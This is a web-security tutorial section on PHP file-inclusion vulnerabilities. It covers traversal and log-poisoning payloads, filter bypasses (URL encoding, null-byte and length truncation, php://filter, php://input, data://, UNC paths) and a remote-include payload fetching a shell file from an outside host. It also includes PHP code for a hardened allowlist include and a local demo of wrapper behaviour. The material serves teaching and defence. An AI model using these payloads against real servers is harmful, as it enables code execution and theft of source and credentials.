4.9. File Include

4.9.1. Basic

A common vulnerable pattern is <?php include("inc/" . $_GET['file']); ?>: the user controls the tail of the included path, and whatever file it resolves to is executed as PHP.

Several commonly used inclusion methods:

  • Include a file from the same directory, e.g. ?file=.htaccess

  • Directory traversal, e.g. ?file=../../../../../../../../../var/lib/locate.db (the long ../ chain works because extra levels above / are ignored)

  • Log injection (log poisoning): write PHP into a log the attacker can influence, then include it, e.g. ?file=../../../../../../../../../var/log/apache/error.log

  • /proc/self/environ: on older setups it exposes the request environment (e.g. HTTP_USER_AGENT), so PHP placed in the User-Agent header runs when the file is included

Any log the attacker can write to can serve as the carrier: SSH auth logs (a failed login records the attempted username), web access or error logs (the request path or User-Agent is recorded), mail logs, and so on.

4.9.2. Triggering Sink

  • PHP
    • include
      • If the file cannot be included, a warning is emitted and execution continues with the following statements.

    • include_once
      • Same as include, but a file already included is not included again.

    • require
      • If the file cannot be included, a fatal error is raised and the script stops; following statements do not run.

    • require_once
      • Same as require, but a file already included is not included again.

  All four are sinks: whichever one a user-controlled path reaches, PHP code in the target file is executed.
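The vulnerable sink from 4.9.1 beside a hardened form, as an added example (this code is not from the original page; the inc/ directory, the page names and the probe inputs are assumptions). The hardened version never puts user data into the path directly: it matches an allowlist first, then canonicalises with realpath and confirms the target stays under the page directory, which also rejects traversal, null bytes, wildcards and stream wrappers. It uses require rather than include so that a missing template is fatal instead of silently skipped.

```php
<?php
// Added example, not code from the original page. "inc/" and the page names
// in ALLOWED_PAGES are assumptions made for the demonstration.

// --- Vulnerable form: the attacker controls the whole tail of the path ---
//   ?file=../../../../etc/passwd                   -> traversal
//   ?file=../../var/log/apache2/access.log         -> log poisoning
//   ?file=php://filter/convert.base64-encode/resource=index.php
//     (wrapper; only works if the "inc/" prefix is absent or truncated away)
function vulnerable_include(string $file): void
{
    include("inc/" . $file);   // include: warning on failure, script continues
}

// --- Hardened form: allowlist + canonicalisation ---
const PAGE_DIR = __DIR__ . '/inc';
const ALLOWED_PAGES = ['home', 'about', 'contact']; // assumed page names

function resolve_page(string $file): ?string
{
    // 1. Exact (strict) allowlist match: "about\0", "../about", "php://..."
    //    and "ab?ut" all fail here before any filesystem call is made.
    if (!in_array($file, ALLOWED_PAGES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and confirm the target is inside
    //    PAGE_DIR (realpath returns false if the file does not exist).
    $base   = realpath(PAGE_DIR);
    $target = realpath(PAGE_DIR . '/' . $file . '.php');
    if ($base === false || $target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

function safe_include(string $file): void
{
    $target = resolve_page($file);
    if ($target === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    // require: failure is a fatal error, nothing after it runs, which is
    // the right behaviour for a template that must exist.
    require $target;
}

// Demonstration with constructed probes (run from the CLI: php this_file.php).
// 'about' prints a path only if inc/about.php actually exists next to the script.
$probes = [
    'about',
    '../../../../etc/passwd',
    '.htaccess',
    "about\0",
    'php://filter/convert.base64-encode/resource=index.php',
    'data://text/plain;base64,SSBsb3ZlIFBIUAo=',
];
foreach ($probes as $probe) {
    printf("%-56s -> %s\n", addcslashes($probe, "\0"), resolve_page($probe) ?? 'rejected');
}
```

The allowlist does the real work; the realpath check is there so that a later refactor which relaxes the allowlist (for example to accept any filename) still cannot escape the directory. Do not rely on realpath alone: it follows symlinks and returns false for non-existent targets, which is fine for a deny decision but means the check must fail closed, as above.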

4.9.3. Bypass Techniques

Applications often run the filename through a check function before including it. The common ways around such checks are:

4.9.3.1. url encoding bypass

If the WAF or the check does a plain string match on the raw parameter, URL-encode the payload (e.g. ../ as %2e%2e%2f); the web server and PHP decode it once before include sees it. Double encoding (%252e) only helps when the application decodes the value a second time itself.

4.9.3.2. Special Character Bypass

  • In some cases the file-reading path supports shell-style wildcards such as ? and *, so a blocked name can be matched without writing it literally

  • When the parameter ends up in a URL (remote include), appending ? or # turns anything the application appends afterwards (such as .php) into a query string or fragment, so it no longer affects which file is fetched

  • In some cases characters with different Unicode encodings but similar glyphs are normalised to the same filename by the filesystem or a conversion layer, so a lookalike passes the check but resolves to the blocked file

4.9.3.3. %00 truncation

Probably the most common classic method: a %00 (null byte) in the parameter terminates the C string, so a suffix the application appends (such as .php) is dropped, e.g. ?file=../../etc/passwd%00. It requires magic_quotes_gpc=Off (otherwise the null byte is escaped to \0) and PHP < 5.3.4; later versions reject paths that contain a null byte.

4.9.3.4. Length truncation

Path length on Windows is limited as a whole: counted from the root directory, a file path may be at most 259 bytes.

The MSDN definition is #define MAX_PATH 260, where the 260th character is the terminating \0. On Linux the limits can be read with getconf: the longest file path (getconf PATH_MAX /root) is 4096 and the longest single file name (getconf NAME_MAX /root) is 255.

When the length is limited, padding the path with a repeated ././././ (n times) pushes it past the limit, and the suffix the application appends is cut off, so ?file=../../etc/passwd/././././...(n) ends up including /etc/passwd.

In PHP includes this bypass requires PHP < 5.2.8.

4.9.3.5. Fake Protocol Bypass

  • Remote include (RFI): requires allow_url_fopen=On and allow_url_include=On; the payload looks like ?file=[http|https|ftp]://websec.wordpress.com/shell.txt

  • PHP input: the POST body is included as the file, so the payload goes in the request body; requires allow_url_include=On, payload like ?file=php://input

  • Base64: read a file through the php://filter pseudo-protocol, payload like ?file=php://filter/convert.base64-encode/resource=index.php. The file is read rather than executed, so PHP source (config files with credentials, for instance) comes back intact; this needs no allow_url_* setting

  • data: the data pseudo-protocol makes the parameter itself the file content, payload like ?file=data://text/plain;base64,SSBsb3ZlIFBIUAo= (decodes to "I love PHP"); requires allow_url_include=On

4.9.3.6. Protocol Bypass

allow_url_fopen and allow_url_include gate the http(s) and ftp wrappers. On Windows a UNC path such as \\attacker\share\shell.php is opened as an ordinary file, so a file served over SMB or WebDAV can be included even when URL includes are disabled.
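What the wrappers from 4.9.3.5 actually hand an attacker, run locally against a constructed file so the behaviour can be seen without a target. This is an added example, not code from the original page; the temporary file and its contents are constructed, and the secret in it is invented for the demonstration.

```php
<?php
// Added example, not from the original page. The temp file and its contents
// are constructed for the demonstration. Run from the CLI: php this_file.php

$source = tempnam(sys_get_temp_dir(), 'lfi');
file_put_contents($source, "<?php\n\$db_password = 'hunter2'; // assumed secret\n");

// 1. php://filter with convert.base64-encode: the file is READ, not executed,
//    so PHP source comes back intact instead of running (include() would
//    otherwise execute index.php and show only its output).
$encoded = file_get_contents('php://filter/convert.base64-encode/resource=' . $source);
$decoded = base64_decode($encoded, true);
var_dump($decoded === file_get_contents($source)); // bool(true)

// 2. Filters can be chained and scoped with read=; string.rot13 is the classic
//    way past a check that only looks for the literal "base64" in the query.
$rot = file_get_contents('php://filter/read=string.rot13/resource=' . $source);
var_dump(str_rot13($rot) === $decoded); // bool(true)

// 3. data:// turns the parameter into the file content. Reading it needs only
//    allow_url_fopen (default On); include() of it needs allow_url_include.
$code    = "<?php echo 'code ran'; ?>";
$payload = 'data://text/plain;base64,' . base64_encode($code);
var_dump(file_get_contents($payload) === $code); // bool(true)
$urlInclude = (bool) ini_get('allow_url_include');
printf("allow_url_include=%s, so include(\$payload) would %s\n",
    $urlInclude ? 'On' : 'Off',
    $urlInclude ? 'execute it' : 'fail with a warning');

// 4. A null byte anywhere in a path is rejected outright on current PHP
//    (7.x: warning, no read; 8.x: ValueError), which is why %00 truncation
//    from 4.9.3.3 only works on the old versions the text names.
try {
    $r = @file_get_contents($source . "\0.php");
    var_dump($r === false || $r === null); // PHP 7: bool(true), nothing was read
} catch (ValueError $e) {
    echo get_class($e), ': ', $e->getMessage(), "\n"; // PHP 8
}

unlink($source);
```

Step 1 is the reason the base64 filter is the standard first move once an include is found: it converts a code-execution primitive into a source-read primitive, which is what you want for reading config files before deciding on a payload. Step 4 is the quickest way to confirm, on a given PHP build, whether null-byte truncation is even worth trying.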